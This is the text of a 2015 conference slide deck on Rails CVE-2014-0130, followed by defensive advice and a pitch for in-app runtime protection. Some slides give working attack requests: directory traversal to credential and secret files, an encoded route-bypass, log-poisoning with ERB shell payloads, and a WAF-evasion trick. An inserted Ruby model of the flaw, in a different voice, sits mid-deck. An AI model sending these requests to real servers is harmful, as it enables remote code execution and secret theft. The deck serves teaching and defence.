
Page 1: GoSec 2015 - Protecting the web from within

Protecting the Web From Within

Mike Milner CTO @immunio

GoSec 2015

Page 2:

Today:

Checked in to my flight

Read the news

Paid for parking

Coffee with the Starbucks app

Boarding pass

Slack

Gmail

Reviewed some pull requests

Uber

GoSec schedule

Trello

Banking

Facebook

Twitter

Ashley Madison

TOP SECRET security clearance with the OPM

Page 3:

All Online

Page 4:

All Online

Who is protecting my data?

Page 5:

How?

Framework up to date?

Libraries patched?

Code reviewed for security?

Monitoring for new CVEs?

Reviewed external libraries?

Static analysis?

Fixed insecure defaults?

Page 6:

Security is Hard

But it can be SOOO

Interesting :)

Page 7:

CVE-2014-0130

"Directory traversal vulnerability"

Credited to Ville Lautanala of Flowdock

Expanded on by Jeff Jarmoc @ Matasano

http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0130

Page 8:

Directory Traversal

Vulnerable route with globbing:

get 'my_url/*action', controller: 'asdf'

*action is supposed to be an action (method) name, which Rails also uses as the name of the template file it looks up under:

RAILS_ROOT/app/views/<controller_name>/

What if I try: my_url/../../../Gemfile

Page 9:

Directory Traversal

• /etc/passwd

• RAILS_ROOT/config/secrets.yml

• RAILS_ROOT/config/initializers/secret_token.rb

• SSL certificates

• /proc/self/environ

• /proc/<pid>/environ

Page 10:

Yikes!

Page 11:

Directory Traversal

Recommendation - use a non-globbing route:

get 'my_url/:action', controller: 'asdf'

Something like ../../../Gemfile won't match, because a :action segment stops at the first slash

BUT!

Route matching happens BEFORE URI decoding, so the same traversal with its slashes percent-encoded still matches the segment and is only decoded afterwards:

my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile

Page 12:

Can We Execute Code?

"Helpful" default behaviour in Rails

A template file whose extension has no registered handler is rendered with the default handler, ERB, so any file the traversal reaches is evaluated as a template:

<%= `whoami` %>

Page 13:

Basics

Write code into file

Ask Rails to execute it

Page 14:

Getting Code into a File

Rails does this for us!

/some/page?mycode=1234

Request parameters are written to production.log

/some/page?mycode=%3c%25%3d%20%60%69%64%60%20%25%3e

That query string decodes to, and is logged as: <%= `id` %>

Page 15:

Putting it Together

Decoded, the request is:

/my_url/../../../log/production.log?mycode=<%= `id` %>

Once the parameter is in the log, rendering log/production.log as an ERB template evaluates the tag and runs the command. Sent with the traversal and the payload percent-encoded, so that even a :action route matches:

/my_url/%2e%2e%2f%2e%2e%2f%2e%2e%2flog%2fproduction%2elog?mycode=%3c%25%3d%20%60%69%64%60%20%25%3e
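The traversal, the :action bypass and the log-poisoning step from the last few slides, as an added example that is not code from the talk or from Rails: a small Ruby model of the render path, with the containment check the vulnerable resolver lacked. RAILS_ROOT, the controller name asdf and the log line are assumptions; the ERB stage renders a pure expression instead of the slide's `id` so it runs without spawning a shell.

```ruby
require "erb"

# Assumed app layout; no Rails install is needed for this model.
RAILS_ROOT = "/srv/app"
VIEWS_DIR  = File.join(RAILS_ROOT, "app", "views")

# Router stage. Matching runs on the still-encoded path: a "*action" glob accepts
# anything, a ":action" segment only refuses a literal "/", so "%2f" slips through.
def route_accepts?(segment, globbing:)
  globbing || !segment.include?("/")
end

# Percent-decoding as the router applies it after the match (no Rails dependency).
def percent_decode(segment)
  segment.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Implicit render: the action name is joined under the controller's view directory.
# File.expand_path collapses the "../" components, which is exactly the traversal.
def template_path(controller, action_segment)
  File.expand_path(File.join(VIEWS_DIR, controller, percent_decode(action_segment)))
end

# The check the vulnerable resolver lacked: the resolved file must stay inside
# app/views/<controller>/.
def inside_views?(path, controller)
  base = File.join(VIEWS_DIR, controller)
  path == base || path.start_with?(base + "/")
end

# Whole pipeline. Returns [:route_rejected, nil], [:outside_views, path] (the
# traversal got through the router; only the containment check stops it) or [:ok, path].
def resolve(controller, action_segment, globbing:)
  return [:route_rejected, nil] unless route_accepts?(action_segment, globbing: globbing)
  path = template_path(controller, action_segment)
  inside_views?(path, controller) ? [:ok, path] : [:outside_views, path]
end

# Log-poisoning stage: a constructed stand-in for the production.log line in which
# Rails records request parameters, carrying whatever the query string decoded to.
def poisoned_log_line(param_value)
  "Processing by AsdfController#index as HTML\n" \
    "  Parameters: {\"mycode\"=>#{param_value.inspect}}\n"
end

# A file with no registered template handler is rendered with ERB, so a tag buried
# in a log line is evaluated like any other template.
def render_as_erb(file_contents)
  ERB.new(file_contents).result(binding)
end
```

Called with the slide's encoded segment and globbing: false, resolve shows the :action workaround letting the traversal through, and only the inside_views? check turns it into a refusal; the same check is the shape of the upstream fix, which rejects action names that resolve outside the view path.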

Page 17:

How to Defend?

Upgrade Rails - fixed in 4.1.1, 4.0.5, 3.2.18

Scan your code - Brakeman >= 2.5.1

Use the recommended workarounds

Only helps AFTER the vulnerability is announced!

Page 18:

Active Defence

Signature based:

Hard to maintain, easy to bypass

WAF?

Page 19:

WAF?

Helpful bypass included in the CVE!

Add backslash escape characters, which Ruby's glob-based path lookup strips, to the traversal to hide it from signatures:

\../\../\../Gemfile

Page 20:

Active Defence

What was the actual exploit?

A file was read that shouldn't be read

Shell commands were executed

Move INSIDE the app and we can see these directly

Page 21:

Protect against the exploit

• Uploaded images should not be executed as code

• Don't load configuration from /tmp

• My app does NOT need to read or write anywhere inside /etc

• In fact, the app shouldn't be writing anywhere except /tmp and /var/log

• And especially not be reading from /etc/ssl or ~/.ssh/id_rsa

Track code that opens files

Page 22:

Protect against the exploit

• Most apps don't need to execute shell commands. FENCE IT OFF!

• If you do need shell, track the code that runs commands.

• The command that minifies my CSS should not be downloading and executing a perl script!

• The command that sends an invoice should not be opening a reverse shell to Russia!

• And block shell access from everywhere else.

Track shell code execution

Page 23:

Inside the App

Much more accurate, fewer false positives.

• SQL Queries for SQL Injection

• Template rendering for Cross Site Scripting

• Authentication attacks and Brute Forcing

• Cross Site Request Forgery

Page 24:

Real-time web application security

Automatic detection and protection against app security vulnerabilities

Java, Python, Ruby

2 minute install

Page 26:

Thank You!

Mike Milner CTO @immunio

GoSec 2015